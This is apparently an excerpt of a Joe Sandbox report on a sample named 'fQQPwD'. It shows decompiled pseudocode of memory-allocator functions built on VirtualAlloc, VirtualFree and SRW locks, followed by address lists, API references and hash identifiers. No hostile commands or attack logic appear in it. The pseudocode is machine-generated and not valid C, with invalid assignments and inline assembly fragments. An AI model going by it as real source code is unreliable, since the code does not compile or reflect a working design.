						_t278 =  *((_t270 >> ( *(0x115a40 - _t185) & 0x000000ff) & 0x00000007) + _t138 * 8 + _t13) & 0x0000ffff;
					} else {
						__eflags = _t136 - 1;
						if(_t136 != 1) {
							_t257 = 0x20;
							__eflags = _t270;
							if(_t270 != 0) {
								asm("bsr edx, edi");
								_t257 = 0x3f;
								__eflags = 0x20;
							}
							_t168 = 0x20 - _t257;
							_t230 =  *(0x115a44 + _t168 * 4) & _t270;
							_t169 = (_t270 >> ( *(0x115a40 - _t257) & 0x000000ff) & 0x00000007) + _t168 * 8;
							__eflags = _t230 - 1;
							asm("sbb eax, 0xffffffff");
							_t19 = _t169 + 0x11580c; // 0x0
							_t170 =  *((_t270 >> ( *(0x115a40 - _t257) & 0x000000ff) & 0x00000007) + _t168 * 8 + _t19) & 0x0000ffff;
							_t270 - 0x41 = _t170 - 0x76;
							_t278 = (_t257 & 0xffffff00 | _t170 - 0x00000076 > 0x00000000) & (_t230 & 0xffffff00 | _t270 - 0x00000041 >= 0x00000000) & 0x000000ff | _t170;
						} else {
							_t232 = _t270 - 0x101;
							_t171 = _t270;
							__eflags = _t232 - 0xfefe;
							if(_t232 <= 0xfefe) {
								__eflags = _t270 == 1;
								if(_t270 == 1) {
									_t239 = 0x20;
								} else {
									asm("bsr ecx, eax");
									_t239 = _t232 ^ 0x0000001f;
								}
								__eflags = 1 - _t270;
								_t171 =  <  ? 1 <<  ~_t239 : 0xbadbb1 >> 2;
							}
							_t285 = 0x20;
							__eflags = _t171;
							if(_t171 != 0) {
								asm("bsr esi, eax");
								_t285 = 0x3f;
								__eflags = 0x20;
							}
							_t261 = 0x20 - _t285;
							_t262 = (_t171 >> ( *(0x115a40 - _t285) & 0x000000ff) & 0x00000007) + _t261 * 8;
							__eflags = ( *(0x115a44 + _t261 * 4) & _t171) - 1;
							asm("sbb edx, 0xffffffff");
							_t31 = _t262 + 0x11580c; // 0x0
							_t238 =  *(_t262 + _t31) & 0x0000ffff;
							_t171 - 0x41 = _t238 - 0x76;
							_t278 = (_t262 & 0xffffff00 | _t238 - 0x00000076 > 0x00000000) & (_t171 & 0xffffff00 | _t171 - 0x00000041 >= 0x00000000) & 0x000000ff | _t238;
							__eflags = _t278;
						}
					}
					_v49 = 0;
					_v56 = 0xffffffff;
					_t247 =  *_t179 & 0x000000ff;
					__eflags = _t247 - 2;
					_v69 = _t247;
					if(_t247 == 2) {
						_t140 =  *0x123d89 & 0x000000ff;
						__eflags = _t140 & 0x00000001;
						if((_t140 & 0x00000001) != 0) {
							L000B7BD0(_t179, _t297);
						}
					}
					__eflags = _t179[3];
					_v68 = _t179;
					if(_t179[3] == 0) {
						_t141 = _t179;
						_t181 = (_t278 & 0x0000ffff) << 5;
						goto L50;
					} else {
						_t156 =  *0x123e38; // 0x0
						_t274 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t156 * 4)) + 0xa0));
						__eflags = _t274 - 2;
						if(_t274 < 2) {
							_push( &_v56);
							_push(_t278 & 0x0000ffff);
							_t144 = E000B9960(_t179);
							_t247 = _v77 & 0x000000ff;
							__eflags = _t144;
							if(_t144 != 0) {
								L35:
								_t272 =  *((intOrPtr*)(_t181 + 0x10)) + _t144;
								__eflags =  *((char*)(_t181 + 6));
								if( *((char*)(_t181 + 6)) != 0) {
									__eflags = _t144 & 0x00000fff;
									if((_t144 & 0x00000fff) == 0) {
										_t181 = _t247;
										_t209 = (_t144 >> 0x00000009 & 0x00000ff8) + (_t144 & 0xffe00000) + 0x2000;
									} else {
										_t77 = _t144 - 4; // -4
										_t209 = _t77;
									}
									 *_t209 = 1;
								}
								__eflags = _t247 - 2;
								if(_t247 == 2) {
									_t201 = _t144 >> 0x15;
									__eflags =  *((short*)(_t201 + _t201 + 0x122d24)) - 0xfffe;
									if( *((short*)(_t201 + _t201 + 0x122d24)) == 0xfffe) {
										_t278 = _t144 & 0xffe00000;
										_t247 = 3 << (_t144 >> 0x00000002 & 0x0000001e);
										_t144 = _t144 >> 0x00000005 & 0x0000fffc;
										asm("lock or [eax+esi+0x4000], edx");
									}
								}
								L40:
								__eflags = _v32 ^ _t287;
								E000DE643(_t144, _t181, _v32 ^ _t287, _t247, _t272, _t278);
								return _t272;
							}
							L47:
							_t184 = _t278 & 0x0000ffff;
							L49:
							_t181 = _t184 << 5;
							__eflags = _t181;
							_t141 = _v64;
							L50:
							_t278 =  &(( &(_t141[_t181]))[0x48]);
							_t92 =  &(_t141[0x40]); // 0x40
							_t271 = _t92;
							__imp__TryAcquireSRWLockExclusive(_t271);
							__eflags = _t141;
							if(_t141 == 0) {
								L000A8B90(_t141, _t271);
							}
							_t142 =  *_t278;
							_t189 =  *_t142;
							__eflags = _t189;
							if(_t189 == 0) {
								L64:
								_t144 = L000B87D0(_t278, _v72, 0, _v64, 0x4000,  &_v53); // executed
								_v88 = _t144;
								__eflags = _t144;
								if(_t144 == 0) {
									goto L67;
								}
								_t142 = (_v68 >> 0x00000009 & 0x00000fe0) + (_v68 & 0xffe00000) - (( *((_v68 >> 0x00000009 & 0x00000fe0) + (_v68 & 0xffe00000) + 0x101e) & 0x3f) << 5) + 0x1000;
								_t181 = _v72;
								goto L59;
							} else {
								_v53 = 0;
								_t247 =  *_t189;
								__eflags = _t247;
								_v68 = _t189;
								if(_t247 == 0) {
									_t210 = 0;
									__eflags = 0;
									L58:
									_t181 = _v72;
									 *_t142 = _t210;
									_t213 = _t142[3] & 0xffffc001 | _t142[3] + 0x00000002 & 0x00003ffe;
									__eflags = _t213;
									_t142[3] = _t213;
									L59:
									_t150 =  *((intOrPtr*)(_t181 + 0x117c)) +  *((intOrPtr*)(_t142[2] + 0xc));
									 *((intOrPtr*)(_t181 + 0x117c)) = _t150;
									_t199 =  *((intOrPtr*)(_t181 + 0x1180));
									__eflags = _t199 - _t150;
									_t151 =  >  ? _t199 : _t150;
									 *((intOrPtr*)(_t181 + 0x1180)) =  >  ? _t199 : _t150;
									__imp__ReleaseSRWLockExclusive(_t271);
									_t247 = _v77 & 0x000000ff;
									_t144 = _v72;
									goto L35;
								}
								_t278 = _t189;
								_v64 =  *((intOrPtr*)(_v72 + 0x48 + _t181 + 0xc));
								_t210 = _t247;
								asm("bswap ecx");
								_t181 = _t210 ^ _t189;
								__eflags = (_t210 ^ _t189) - 0x1fffff;
								if((_t210 ^ _t189) > 0x1fffff) {
									L66:
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x20], xmm0");
									_t271 =  &_v52;
									_t153 = L000A88D0(_t271, "first", _t247, 0);
									_push(_t271);
									E00070790(_t153);
									_t144 = L000A8960(_v76, _t297);
									L67:
									__imp__ReleaseSRWLockExclusive(_t271);
									_t272 = 0;
									goto L40;
								}
								_t181 = _t210 & 0x001fc000;
								__eflags = _t210 & 0x001fc000;
								if((_t210 & 0x001fc000) == 0) {
									goto L66;
								}
								asm("prefetcht0 [ecx]");
								goto L58;
							}
						}
						 *((intOrPtr*)(_t274 + 8)) =  *((intOrPtr*)(_t274 + 8)) + 1;
						asm("adc dword [edi+0xc], 0x0");
						_t184 = _t278 & 0x0000ffff;
						__eflags =  *0x122d20 - _t278; // 0x1f
						if(__eflags < 0) {
							 *((intOrPtr*)(_t274 + 0x28)) =  *((intOrPtr*)(_t274 + 0x28)) + 1;
							asm("adc dword [edi+0x2c], 0x0");
							 *((intOrPtr*)(_t274 + 0x18)) =  *((intOrPtr*)(_t274 + 0x18)) + 1;
							asm("adc dword [edi+0x1c], 0x0");
							goto L49;
						}
						_t159 =  *(_t274 + 0x58 + _t184 * 8);
						__eflags = _t159;
						_v64 = _t278;
						if(_t159 == 0) {
							 *((intOrPtr*)(_t274 + 0x20)) =  *((intOrPtr*)(_t274 + 0x20)) + 1;
							asm("adc dword [edi+0x24], 0x0");
							 *((intOrPtr*)(_t274 + 0x18)) =  *((intOrPtr*)(_t274 + 0x18)) + 1;
							asm("adc dword [edi+0x1c], 0x0");
							E000A85A0(_t274, _t184);
							_t159 =  *(_t274 + 0x58 + _t184 * 8);
							__eflags = _t159;
							if(_t159 != 0) {
								L30:
								_t278 =  *(_t274 + 0x5e + _t184 * 8) & 0x0000ffff;
								_t247 = _t159;
								_t161 =  *_t159;
								__eflags = _t161;
								if(_t161 == 0) {
									_t223 = 0;
									__eflags = 0;
									L34:
									 *((char*)(_t274 + 0x5c + _t184 * 8)) =  *((char*)(_t274 + 0x5c + _t184 * 8)) - 1;
									 *(_t274 + 0x58 + _t184 * 8) = _t223;
									_v56 = _t278;
									 *_t274 =  *_t274 - ( *(_t274 + 0x5e + _t184 * 8) & 0x0000ffff);
									_t181 = _v68;
									_t144 = _t247;
									_t247 = _v69 & 0x000000ff;
									_t278 = _v64;
									__eflags = _t144;
									if(_t144 == 0) {
										goto L47;
									}
									goto L35;
								}
								_t223 = _t161;
								asm("bswap ecx");
								__eflags = _t223 & 0x001fc000;
								if((_t223 & 0x001fc000) == 0) {
									asm("pcmpeqd xmm0, xmm0");
									asm("movdqa [esp+0x20], xmm0");
									_t271 =  &_v48;
									_t163 = L000A88D0(_t271, "first", _t161, 0);
									_push(_t271);
									E00070790(_t163);
									L000A8960(_t278, _t297);
									goto L64;
								}
								asm("prefetcht0 [ecx]");
								goto L34;
							}
							goto L49;
						}
						 *((intOrPtr*)(_t274 + 0x10)) =  *((intOrPtr*)(_t274 + 0x10)) + 1;
						asm("adc dword [edi+0x14], 0x0");
						goto L30;
					}
				}
				if(_t295 == 0) {
					goto L7;
				}
				_t270 = _t268 + _t179[0xc];
				if(_t270 >= 0) {
					goto L8;
				} else {
					asm("int3");
					asm("ud2");
					goto L5;
				}
			}

0x000b1960
0x000b1960
0x000b196c
0x000b196f
0x000b1976
0x000b197a
0x000b1982
0x000b199f
0x000b19a4
0x000b19a4
0x000b1991
0x000b1991
0x000b1993
0x000b19a8
0x000b19a9
0x000b19ac
0x000b19ac
0x000b19ad
0x000b19ad
0x000b19b1
0x000b19b4
0x000b19b8
0x000b19ec
0x000b19f1
0x000b19f3
0x000b19f5
0x000b19f8
0x000b19f8
0x000b19f8
0x000b19fb
0x000b1a17
0x000b1a1a
0x000b1a1d
0x000b1a20
0x000b1a20
0x000b19ba
0x000b19ba
0x000b19bd
0x000b1a32
0x000b1a37
0x000b1a39
0x000b1a3b
0x000b1a3e
0x000b1a3e
0x000b1a3e
0x000b1a4f
0x000b1a5b
0x000b1a5d
0x000b1a60
0x000b1a63
0x000b1a66
0x000b1a66
0x000b1a74
0x000b1a80
0x000b19bf
0x000b19bf
0x000b19c5
0x000b19c7
0x000b19cd
0x000b19d5
0x000b19d6
0x000b1a84
0x000b19dc
0x000b19dc
0x000b19df
0x000b19df
0x000b1a9c
0x000b1a9e
0x000b1a9e
0x000b1aa6
0x000b1aab
0x000b1aad
0x000b1aaf
0x000b1ab2
0x000b1ab2
0x000b1ab2
0x000b1ac3
0x000b1ad1
0x000b1ad4
0x000b1ad7
0x000b1ada
0x000b1ada
0x000b1ae8
0x000b1af4
0x000b1af4
0x000b1af4
0x000b19bd
0x000b1af6
0x000b1afb
0x000b1b03
0x000b1b06
0x000b1b09
0x000b1b0d
0x000b1c03
0x000b1c0a
0x000b1c0c
0x000b1c12
0x000b1c12
0x000b1c0c
0x000b1b13
0x000b1b17
0x000b1b1b
0x000b1bf6
0x000b1bfb
0x00000000
0x000b1b21
0x000b1b21
0x000b1b30
0x000b1b36
0x000b1b39
0x000b1c5e
0x000b1c5f
0x000b1c60
0x000b1c65
0x000b1c6a
0x000b1c6c
0x000b1bbd
0x000b1bc0
0x000b1bc2
0x000b1bc6
0x000b1bc8
0x000b1bcd
0x000b1d7c
0x000b1d93
0x000b1bd3
0x000b1bd3
0x000b1bd3
0x000b1bd3
0x000b1bd6
0x000b1bd6
0x000b1bdc
0x000b1bdf
0x000b1c1e
0x000b1c21
0x000b1c2a
0x000b1c2e
0x000b1c41
0x000b1c46
0x000b1c4b
0x000b1c4b
0x000b1c2a
0x000b1be1
0x000b1be5
0x000b1be7
0x000b1bf5
0x000b1bf5
0x000b1c72
0x000b1c72
0x000b1c87
0x000b1c87
0x000b1c87
0x000b1c8a
0x000b1c8e
0x000b1c91
0x000b1c94
0x000b1c94
0x000b1c98
0x000b1c9e
0x000b1ca0
0x000b1ca4
0x000b1ca4
0x000b1ca9
0x000b1cab
0x000b1cad
0x000b1caf
0x000b1dcd
0x000b1de3
0x000b1de8
0x000b1dec
0x000b1dee
0x00000000
0x00000000
0x000b1e18
0x000b1e1d
0x00000000
0x000b1cb5
0x000b1cb5
0x000b1cba
0x000b1cbc
0x000b1cbe
0x000b1cc2
0x000b1cfc
0x000b1cfc
0x000b1cfe
0x000b1cfe
0x000b1d02
0x000b1d16
0x000b1d16
0x000b1d18
0x000b1d1b
0x000b1d24
0x000b1d27
0x000b1d2d
0x000b1d33
0x000b1d35
0x000b1d38
0x000b1d3f
0x000b1d45
0x000b1d4a
0x00000000
0x000b1d4a
0x000b1cc4
0x000b1cd1
0x000b1cd5
0x000b1cd7
0x000b1cdb
0x000b1cdd
0x000b1ce3
0x000b1e26
0x000b1e26
0x000b1e2a
0x000b1e30
0x000b1e3e
0x000b1e43
0x000b1e44
0x000b1e50
0x000b1e55
0x000b1e56
0x000b1e5c
0x00000000
0x000b1e5c
0x000b1ceb
0x000b1ceb
0x000b1cf1
0x00000000
0x00000000
0x000b1cf7
0x00000000
0x000b1cf7
0x000b1caf
0x000b1b3f
0x000b1b43
0x000b1b47
0x000b1b4a
0x000b1b51
0x000b1c77
0x000b1c7b
0x000b1c7f
0x000b1c83
0x00000000
0x000b1c83
0x000b1b57
0x000b1b5b
0x000b1b5d
0x000b1b61
0x000b1d53
0x000b1d57
0x000b1d5b
0x000b1d5f
0x000b1d66
0x000b1d6b
0x000b1d6f
0x000b1d71
0x000b1b6f
0x000b1b6f
0x000b1b74
0x000b1b76
0x000b1b78
0x000b1b7a
0x000b1b91
0x000b1b91
0x000b1b93
0x000b1b93
0x000b1b97
0x000b1b9b
0x000b1ba4
0x000b1ba6
0x000b1baa
0x000b1bac
0x000b1bb1
0x000b1bb5
0x000b1bb7
0x00000000
0x00000000
0x00000000
0x000b1bb7
0x000b1b7c
0x000b1b7e
0x000b1b80
0x000b1b86
0x000b1da0
0x000b1da4
0x000b1daa
0x000b1db8
0x000b1dbd
0x000b1dbe
0x000b1dc8
0x00000000
0x000b1dc8
0x000b1b8c
0x00000000
0x000b1b8c
0x00000000
0x000b1d77
0x000b1b67
0x000b1b6b
0x00000000
0x000b1b6b
0x000b1b1b
0x000b1995
0x00000000
0x00000000
0x000b1997
0x000b199a
0x00000000
0x000b199c
0x000b199c
0x000b199d
0x00000000
0x000b199d

APIs

TryAcquireSRWLockExclusive.KERNEL32(00000040), ref: 000B1C98
ReleaseSRWLockExclusive.KERNEL32(00000040), ref: 000B1D3F
ReleaseSRWLockExclusive.KERNEL32(00000040,?,00000000,?,00004000,00000000), ref: 000B1E56

Strings

first, xrefs: 000B1DB3, 000B1E39

Memory Dump Source

Source File: 00000010.00000002.503627691.0000000000061000.00000020.00000001.01000000.00000004.sdmp, Offset: 00060000, based on PE: true

Associated: 00000010.00000002.503616294.0000000000060000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504300546.0000000000106000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504435698.0000000000120000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504454499.0000000000121000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504486763.0000000000122000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504552019.0000000000131000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504572122.000000000013A000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.504579268.000000000013B000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_60000_fQQPwD.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID: first
API String ID: 1021914862-2456940119
Opcode ID: 51fc1afb58af6f88d94a0f88175a1b3fd3b920bde8e9fac1982ff20f400d936c
Instruction ID: 1e5fbd5c3e52ca9f68c1849673962e554fa98240d9e5ef756c8e27b4fbade0d8
Opcode Fuzzy Hash: 51fc1afb58af6f88d94a0f88175a1b3fd3b920bde8e9fac1982ff20f400d936c
Instruction Fuzzy Hash: 8CD124726047418BD718CF28C8A07FAB7E2FFC5314F58862DE8568B696EB34D945CB80

Uniqueness

Uniqueness Score: -1.00%

Function 000BC090 Relevance: 13.6, APIs: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E000BC090(long __ebx, void* __ecx, long __edx, void* __edi, long __esi, void* __fp0, void* _a4, intOrPtr _a8) {
				intOrPtr _v0;
				void* _v4;
				long _v8;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				long _v44;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _t73;
				void* _t74;
				long _t75;
				long _t76;
				void* _t77;
				long _t78;
				void* _t79;
				void* _t84;
				void* _t85;
				void* _t86;
				void* _t122;
				long _t123;
				long _t124;
				long _t138;
				signed int _t139;
				signed int _t140;
				void* _t151;
				long _t152;
				void* _t162;
				long _t164;
				void* _t174;
				void* _t176;
				void* _t178;
				void* _t184;
				void* _t185;
				void* _t198;

				_t198 = __fp0;
				_t160 = __esi;
				_t138 = __edx;
				_t122 = __ecx;
				_t109 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t185 = _t184 - 0xc;
				_t73 = _a4;
				_t151 = _t73 - 1;
				_v24 = _t151;
				if(_t151 <= 5) {
					__esi = 2;
					switch( *((intOrPtr*)(__edi * 4 +  &M001164CC))) {
						case 0:
							goto L54;
						case 1:
							__esi = 4;
							goto L54;
						case 2:
							__esi = 0x20;
							goto L54;
						case 3:
							__esi = 0x40;
							goto L54;
					}
				}
				L54:
				__eflags = _t73;
				_t109 = (0 | _t73 != 0x00000000 | 0x00000002) << 0xc;
				_v28 = _t122;
				_t152 = _t138; // executed
				_t74 = VirtualAlloc(_t122, _t138, _t109, 1); // executed
				__eflags = _t74;
				if(_t74 == 0) {
					_v20 = _t152;
					_t75 = GetLastError();
					_t76 =  *0x134b80;
					 *0x134b80 = _t75;
					_t162 = 0;
					_t151 = _v28;
					__eflags = _t151;
					if(_t151 == 0) {
						__imp__TryAcquireSRWLockExclusive(0x134b90);
						__eflags = _t76;
						if(_t76 == 0) {
							L000A8B90(_t76, 0x134b90);
						}
						_t77 =  *0x134b88;
						__eflags = _t77;
						if(_t77 == 0) {
							L64:
							__imp__ReleaseSRWLockExclusive(0x134b90);
							_t139 = _v24;
							__eflags = _t139 - 5;
							if(_t139 > 5) {
								_t78 = 1;
								_t123 = _v20;
							} else {
								_t123 = _v20;
								switch( *((intOrPtr*)(_t139 * 4 +  &M001164E4))) {
									case 0:
										goto L70;
									case 1:
										_t78 = 4;
										goto L70;
									case 2:
										__eax = 0x20;
										goto L70;
									case 3:
										__eax = 0x40;
										goto L70;
								}
							}
							L70:
							_t79 = VirtualAlloc(_t151, _t123, _t109, _t78);
							_t162 = _t79;
							__eflags = _t79;
							if(_t79 != 0) {
								goto L56;
							} else {
								 *0x134b80 = GetLastError();
							}
							goto L58;
						} else {
							_t160 =  *0x134b8c;
							_t84 = VirtualFree(_t77, 0, 0x8000);
							__eflags = _t84;
							if(_t84 == 0) {
								asm("int3");
								asm("ud2");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t174);
								_t176 = _t185;
								_t85 = VirtualFree(_v28, _v24, 0x4000);
								__eflags = _t85;
								if(_t85 != 0) {
									L75:
									return _t85;
								} else {
									_t85 = GetLastError();
									__eflags = _t85;
									if(__eflags != 0) {
										asm("int3");
										asm("ud2");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t174 = _t176;
										_push(_t174);
										_t178 = _t185;
										_t140 = _v24;
										_t164 = _v28;
										_t86 = _v32;
										if(_t140 > 6) {
											_t124 = 1;
											goto L7;
										} else {
											switch( *((intOrPtr*)(_t140 * 4 +  &M00116498))) {
												case 0:
													L12:
													_t87 = VirtualFree(_t87, _t164, 0x4000);
													if(_t87 != 0) {
														goto L14;
													} else {
														_t87 = GetLastError();
														if(_t87 != 0) {
															asm("int3");
															asm("ud2");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t178);
															_t180 = _t185;
															_push(_t109);
															_push(_t151);
															_push(_t164);
															_t187 = _t185 - 0xc;
															_t155 = _v32;
															_t167 =  ~_t155;
															_t141 = _v36;
															_t114 = _v40;
															__eflags = _t114;
															if(_t114 == 0) {
																_t107 = E000CC500();
																_t141 = _v8;
																_t114 = (_t107 & _t167) + _v0;
																__eflags = _t114;
															}
															_v36 = _t167;
															_t168 = _t155 - 1;
															_t88 = E000BC090(_t114, _t114, _t141, _t155, _t168, _t198, _a4, _a8);
															_t188 = _t187 + 8;
															_t156 = _t88;
															__eflags = _t88;
															if(_t88 == 0) {
																__eflags = _t114;
																_t142 = _v8;
																_t89 = _v36;
																if(_t114 == 0) {
																	goto L41;
																} else {
																	goto L23;
																}
															} else {
																__eflags = (_t156 & _t168) - _v0;
																if((_t156 & _t168) == _v0) {
																	L44:
																	return _t156;
																} else {
																	_t92 = VirtualFree(_t156, 0, 0x8000);
																	__eflags = _t92;
																	if(_t92 == 0) {
																		L46:
																		asm("int3");
																		asm("ud2");
																		goto L47;
																	} else {
																		_t142 = _v8;
																		asm("lock sub [0x134b84], edx");
																		_t89 = _v36;
																		L23:
																		_v40 = _t168;
																		_t170 = _v0;
																		_t117 = (_t156 + _t168 & _t89) + _t170;
																		_t91 = E000BC090(_t117, _t117, _t142, _t156 + _t168 & _t89, _t170, _t198, _a4, _a8);
																		_t188 = _t188 + 8;
																		__eflags = _t91;
																		if(_t91 == 0) {
																			__eflags = _t117;
																			_t127 = _v8;
																			if(_t117 == 0) {
																				L41:
																				_t156 = 0;
																				goto L44;
																			} else {
																				goto L28;
																			}
																		} else {
																			_t156 = _t91;
																			__eflags = (_t91 & _v40) - _t170;
																			if((_t91 & _v40) == _t170) {
																				goto L44;
																			} else {
																				_t92 = VirtualFree(_t156, 0, 0x8000);
																				__eflags = _t92;
																				if(_t92 == 0) {
																					goto L46;
																				} else {
																					_t127 = _v8;
																					asm("lock sub [0x134b84], ecx");
																					_t170 = _v0;
																					L28:
																					_t92 = _v4;
																					_t119 = _t127 + _t92 + 0xffff0000;
																					__eflags = _t119 - _t127;
																					if(_t119 < _t127) {
																						L47:
																						asm("int3");
																						asm("ud2");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t180);
																						_push(_v52);
																						_push(_v56);
																						_push(0);
																						_push(_v60);
																						_push(_v64);
																						_push(_v68);
																						L16();
																						return _t92;
																					} else {
																						_v36 = _t92 + 0xffff0000;
																						__eflags = _a4;
																						_v44 = (0 | _a4 != 0x00000000 | 0x00000002) << 0xc;
																						_t156 = 0;
																						asm("o16 nop [cs:eax+eax]");
																						while(1) {
																							_t98 = E000BC090(_t119, 0, _t119, _t156, _t170, _t198, _a4, _a8);
																							_t188 = _t188 + 8;
																							__eflags = _t98;
																							if(_t98 == 0) {
																								goto L44;
																							}
																							_t130 = _t98 & _v40;
																							__eflags = _t130 - _t170;
																							_t145 =  >  ? _v4 : 0;
																							_t173 = _t170 + _t98 - _t130 + ( >  ? _v4 : 0);
																							_t132 = _t173 - _t98;
																							__eflags = _v36 - _t132 | _t132;
																							if((_v36 - _t132 | _t132) == 0) {
																								L43:
																								_t156 = _t98;
																								goto L44;
																							} else {
																								_t92 = VirtualFree(_t98, 0, 0x8000);
																								__eflags = _t92;
																								if(_t92 == 0) {
																									asm("int3");
																									asm("ud2");
																									goto L46;
																								} else {
																									asm("lock sub [0x134b84], ebx");
																									_t133 = _a4 - 1;
																									__eflags = _t133 - 5;
																									_t149 = _v8;
																									if(_t133 > 5) {
																										_t100 = 1;
																										asm("o16 nop [cs:eax+eax]");
																									} else {
																										switch( *((intOrPtr*)(_t133 * 4 +  &M001164B4))) {
																											case 0:
																												goto L39;
																											case 1:
																												_t100 = 4;
																												goto L39;
																											case 2:
																												__eax = 0x20;
																												goto L39;
																											case 3:
																												__eax = 0x40;
																												goto L39;
																										}
																									}
																									L39:
																									_t98 = VirtualAlloc(_t173, _t149, _v44, _t100);
																									__eflags = _t98;
																									if(_t98 != 0) {
																										asm("lock add [0x134b84], ecx");
																										goto L43;
																									} else {
																										 *0x134b80 = GetLastError();
																										_t170 = _v0;
																										continue;
																									}
																								}
																							}
																							goto L78;
																						}
																						goto L44;
																					}
																				}
																			}
																		}
																	}
																}
															}
														} else {
															goto L14;
														}
													}
													goto L78;
												case 1:
													L7:
													_t87 = VirtualAlloc(_t86, _t164, 0x1000, _t124); // executed
													if(_t87 != 0) {
														L14:
														return _t87;
													} else {
														_t87 = GetLastError();
														_t194 = _t87 - 0x5af;
														if(_t87 == 0x5af) {
															_push(_t164);
															_t87 = L000B0DD0(_t140, _t194, _t198);
														}
														if(_t87 == 0) {
															goto L14;
														} else {
															asm("int3");
															asm("ud2");
															goto L12;
														}
													}
													goto L78;
												case 2:
													_t124 = 4;
													goto L7;
												case 3:
													__ecx = 0x20;
													goto L7;
												case 4:
													__ecx = 0x40;
													goto L7;
											}
										}
									} else {
										goto L75;
									}
								}
							} else {
								asm("lock sub [0x134b84], esi");
								 *0x134b88 = 0;
								 *0x134b8c = 0;
								goto L64;
							}
						}
					} else {
						goto L58;
					}
				} else {
					_t162 = _t74;
					L56:
					asm("lock add [0x134b84], edi");
					L58:
					return _t162;
				}
				L78:
			}

0x000bc090
0x000bc090
0x000bc090
0x000bc090
0x000bc090
0x000bc093
0x000bc094
0x000bc095
0x000bc096
0x000bc099
0x000bc09c
0x000bc0a2
0x000bc0a5
0x000bc0a7
0x000bc0ac
0x00000000
0x00000000
0x00000000
0x000bc0b3
0x00000000
0x00000000
0x000bc0ba
0x00000000
0x00000000
0x000bc0c1
0x00000000
0x00000000
0x000bc0ac
0x000bc0cd
0x000bc0cf
0x000bc0d7
0x000bc0de
0x000bc0e1
0x000bc0e3
0x000bc0e9
0x000bc0eb
0x000bc0f8
0x000bc0fb
0x000bc101
0x000bc101
0x000bc107
0x000bc109
0x000bc10c
0x000bc10e
0x000bc11f
0x000bc125
0x000bc127
0x000bc12e
0x000bc12e
0x000bc133
0x000bc138
0x000bc13a
0x000bc173
0x000bc178
0x000bc17e
0x000bc181
0x000bc184
0x000bc1a3
0x000bc1a8
0x000bc186
0x000bc18b
0x000bc18e
0x00000000
0x00000000
0x00000000
0x000bc195
0x00000000
0x00000000
0x000bc19c
0x00000000
0x00000000
0x000bc1ad
0x00000000
0x00000000
0x000bc18e
0x000bc1b2
0x000bc1b8
0x000bc1be
0x000bc1c0
0x000bc1c2
0x00000000
0x000bc1c8
0x000bc1ce
0x000bc1ce
0x00000000
0x000bc13c
0x000bc13c
0x000bc14a
0x000bc150
0x000bc152
0x000bc1d9
0x000bc1da
0x000bc1dc
0x000bc1dd
0x000bc1de
0x000bc1df
0x000bc1e0
0x000bc1e1
0x000bc1ee
0x000bc1f4
0x000bc1f6
0x000bc203
0x000bc203
0x000bc1f8
0x000bc1f8
0x000bc1fe
0x000bc200
0x000bc204
0x000bc205
0x000bc207
0x000bc208
0x000bc209
0x000bc20a
0x000bc20b
0x000bc20c
0x000bc20d
0x000bc20e
0x000bc20f
0x000bc213
0x000bbdd0
0x000bbdd1
0x000bbdd4
0x000bbdd7
0x000bbdda
0x000bbde0
0x000bbdfc
0x00000000
0x000bbde2
0x000bbde7
0x00000000
0x000bbe34
0x000bbe3b
0x000bbe43
0x00000000
0x000bbe45
0x000bbe45
0x000bbe4d
0x000bbe52
0x000bbe53
0x000bbe55
0x000bbe56
0x000bbe57
0x000bbe58
0x000bbe59
0x000bbe5a
0x000bbe5b
0x000bbe5c
0x000bbe5d
0x000bbe5e
0x000bbe5f
0x000bbe60
0x000bbe61
0x000bbe63
0x000bbe64
0x000bbe65
0x000bbe66
0x000bbe69
0x000bbe6e
0x000bbe70
0x000bbe73
0x000bbe76
0x000bbe78
0x000bbe7a
0x000bbe7f
0x000bbe86
0x000bbe86
0x000bbe86
0x000bbe89
0x000bbe8c
0x000bbe97
0x000bbe9c
0x000bbe9f
0x000bbea1
0x000bbea3
0x000bbed7
0x000bbed9
0x000bbedc
0x000bbedf
0x00000000
0x00000000
0x00000000
0x00000000
0x000bbea5
0x000bbea9
0x000bbeac
0x000bc054
0x000bc05d
0x000bbeb2
0x000bbeba
0x000bbec0
0x000bbec2
0x000bc061
0x000bc061
0x000bc062
0x00000000
0x000bbec8
0x000bbec8
0x000bbecb
0x000bbed2
0x000bbee5
0x000bbee5
0x000bbeee
0x000bbef1
0x000bbefb
0x000bbf00
0x000bbf03
0x000bbf05
0x000bbf3b
0x000bbf3d
0x000bbf40
0x000bc044
0x000bc044
0x00000000
0x00000000
0x00000000
0x00000000
0x000bbf07
0x000bbf07
0x000bbf0e
0x000bbf10
0x00000000
0x000bbf16
0x000bbf1e
0x000bbf24
0x000bbf26
0x00000000
0x000bbf2c
0x000bbf2c
0x000bbf2f
